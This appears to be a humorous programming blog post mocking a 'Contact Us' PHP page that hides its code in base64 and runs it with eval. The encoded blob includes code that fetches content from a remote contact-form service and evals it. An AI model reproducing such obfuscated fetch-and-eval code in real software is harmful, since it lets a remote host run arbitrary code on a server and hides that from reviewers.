Andreas C stumbled upon what might possibly be the most secure code ever written. At least, according to its original author.

Following is the contents of just one of many similarly coded PHP pages...

<?PHP session_start(); $str = 'PD9waHAgc2Vzc2lvbl9zdGFydCgpOyAgDQoNCi8vL01BSUxQRVJNSU4vLy8NCmlmIChpc3NldCgkX1NFU1

NJT05bJ3o4MTJGNzA4QTE4MjYyOTJmUzY1NjlQNzY1QTc1MzE5MzV6NDg1MkU3NDhBNTgzMDI1MiddKSkgew0KICAk

X1NFU1NJT05bJ3g2MTBZNzA2QTE2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddID0gdG

ltZSgpOw0KICAkczMzMzdGNzMzQTQzMjg3NjdVNTE1NUE3NTFBNjEzMDU0OXgzODQySzczOEE0ODI5MjYyID0gDQog

ICAgYWJzKCRfU0VTU0lPTlsneDYxMFk3MDZBMTYyNjA5NGhTNDk1M1c3NDlBNTkzMDM1MVo2NDY4TDc2NEE3NDMxOD

M2J10gDQogICAgICAtICRfU0VTU0lPTlsnejgxMkY3MDhBMTgyNjI5MmZTNjU2OVA3NjVBNzUzMTkzNXo0ODUyRTc0

OEE1ODMwMjUyJ10pOyANCg0KICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1Nj

MwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0K

ICBpZiAoICgkX1NFU1NJT05bJ3MxNzIxVTcxN0EyNzI3MTgzdDI2RDcwMmExMjI2MDE5OHh5NzExVDcwN0ExNzI2MT

kzaiddID49IDIwKSAgDQogICAgICAgJiYgKCRzMzMzN0Y3MzNBNDMyODc2N1U1MTU1QTc1MUE2MTMwNTQ5eDM4NDJL

NzM4QTQ4MjkyNjIgPD0gMzAqIDYwICkpIHsNCiAgICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3

g0NjUwUzc0NkE1NjMwMDU0ID0gMzAgKiA2MCAtICR6MzIzNlQ3MzJBNDIyODY2OHU0MzQ3Wjc0M0E1MzI5NzU3eDQ2

NTBTNzQ2QTU2MzAwNTQ7DQogICAgZWNobyAieW91IGhhdmUgZXhjZWVkZWQgdGhlIG51bWJlciBvZiB0aW1lcyB5b3

UgYXJlIGFsbG93ZWQgdG8gdXNlIHRoaXMgZm9ybSA8YnI+PGJyPlBsZWFzZSB0cnkgYWdhaW4gaW4gYW4gb25lICgx

KWhvdXIgb3IgdGhyZWUoMyk8YnI+IjsNCiAgICBleGl0Ow0KICB9DQogIGVsc2VpZiAoJHMzMzM3RjczM0E0MzI4Nz

Y3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA+IDMwKiA2MCApIHsNCiAgICBzZXNzaW9uX3Vuc2V0

KCk7IA0KICAgICRfU0VTU0lPTlsnczE3MjFVNzE3QTI3MjcxODN0MjZENzAyYTEyMjYwMTk4eHk3MTFUNzA3QTE3Mj

YxOTNqJ10gPSAwOw0KICB9CQ0KfSANCmlmIChpc3NldCAoJF9TRVNTSU9OWyd5NzExVDcwN0ExNzI2MTkzalM1NzYx

VDc1N0E2NzMxMTQzWjU2NjBZNzU2QTY2MzEwNDQnXSkpIHsNCiAgJF9TRVNTSU9OWyd4NjEwWTcwNkExNjI2MDk0aF

M0OTUzVzc0OUE1OTMwMzUxWjY0NjhMNzY0QTc0MzE4MzYnXSA9IHRpbWUoKTsNCiAgJHMzMzM3RjczM0E0MzI4NzY3

VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA9IA0KICAgIGFicygkX1NFU1NJT05bJ3g2MTBZNzA2QT

E2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddIA0KICAgICAgLSAkX1NFU1NJT05bJ3k3

MTFUNzA3QTE3MjYxOTNqUzU3NjFUNzU3QTY3MzExNDNaNTY2MFk3NTZBNjYzMTA0NCddKTsNCg0KICAkejMyMzZUNz

MyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUx

NTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0KDQogIGlmICgkejMyMzZUNzMyQTQyMjg2Njh1ND

M0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID4gMikgew0KICAgICRfU0VTU0lPTlsneDIyMjZENzIyQTMy

Mjc2NzhUNjY3ME83NjZBNzYzMjAzNHkzMTM1WTczMUE0MTI4NTY5J10gPSAiIjsNCiAgfQ0KfQkJCQkJCQkJCQkJCQ

kJCQkJCQkJCQkvLy9NQUlMUEVSTUlOLy8vDQoNCiRpZF9oZCA9ICc4OEJCLTU4MjInOw0KJGlkX251bSA9ICdmZ2ho

aWprbGtsbW5vcHFyc3R2dnZ3eHd5eUJESkxOUVNVWVphWmRlZmhra21tbnBwcXN2eUFCREVGSUxRVVhYWVhXVE9JeG

tXSnluZldOSUN6dXFsZmFWUExHQXRsZmJWU09MS0lJSkxQVmFmbHJ5SFNkbXhHUGJpckFKVWd1RlEnOw0KPz4NCjw/

cGhwIA0KDQokbXlfdmFyID0gJyc7DQokcGFnZV9kYXRhID0gPDw8IFBBR0VfREFUQQ0KUEFHRV9EQVRBOw0KJFk2Mz

Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSA9IEBmb3BlbiAoImh0dHA6Ly93

d3cuc3BhbWZyZWVjb250YWN0LmNvbS9lcnIvP189NDAyJm9rPSRpZF9udW0iLCAiciIpOw0KaWYgKCEkWTYzNjdLNz

YzQTczMzE3MzdXODU4OUI3ODVBOTUzMzkxNVU5MTk1Tzc5MUExMDEzNDUxKSB7DQogIC8qIGVjaG8gIjxwPlVuYWJs

ZSB0byBvcGVuIHJlbW90ZSBmaWxlLiI7ICovIA0KICAvKiBleGl0OyAqLw0KfQ0KZWxzZSB7DQoNCiAgd2hpbGUgKC

FmZW9mKCRZNjM2N0s3NjNBNzMzMTczN1c4NTg5Qjc4NUE5NTMzOTE1VTkxOTVPNzkxQTEwMTM0NTEpKSB7DQogICAg

JFk1NTU5VTc1NUE2NTMwOTQ1dzI5MzNINzI5QTM5MjgzNzF2NDhINzA0QTE0MjYwMzk2dyAuPSBmZ2V0cyAoJFk2Mz

Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSwgMTAyNCk7DQogIH0NCiAgZXZh

bCAoJyA/PicgLiAkWTU1NTlVNzU1QTY1MzA5NDV3MjkzM0g3MjlBMzkyODM3MXY0OEg3MDRBMTQyNjAzOTZ3IC4gJz

w/cGhwICcpOw0KICBmY2xvc2UoJFk2MzY3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAx

MzQ1MSk7DQp9DQoNCmlmICgoJGdvdHRlbiA9PSAxMTEpJiYoJGhkID09ICRpZF9oZCApKSB7DQogIGluY2x1ZGUgKC

dpbml0cm9kZUdsb2JhbF9jb20ucGhwJyk7DQp9IA0KZWxzZWlmICgkZ290dGVuICE9IDExMSkgeyANCiAgaW5jbHVk

ZSAoJ2luaXRyb2RlR2xvYmFsX2NvbS5waHAnKTsNCn0gDQplbHNlaWYgKCgkZ290dGVuID09IDExMSkmJigkaGQgIT

0gJGlkX2hkICkpIHsNCiAgZWNobyAkZXJyb3JfbXNnOw0KfSANCj8+'; $str2 = base64_decode($str); /* echo '<pre>'.$str2.'</pre>'; */ /* exit(); */ eval (' ?' . '>' .$str2 . '<' . '?php ');?>

Of course, base-64 encoding was not the original coder’s only line of defense. Just in case a clever hacker gained access to the server containing the PHP code files, and figured out how to decode base-64, the hacker would likely hit a wall against these impossibly-long variable names in the decoded code...

///MAILPERMIN/// if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) { $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time(); $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']); $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60; if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20) && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) { $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054; echo "you have exceeded the number of times you are allowed to use this form <br><br>Please try again in an one (1)hour or three(3)<br>"; exit; ...

Of course, the full code is certainly worthwhile checking out. So, hackers, go forth and decode.

As for what this super-secret-sensitive page was used for... it was a “Contact Us” form.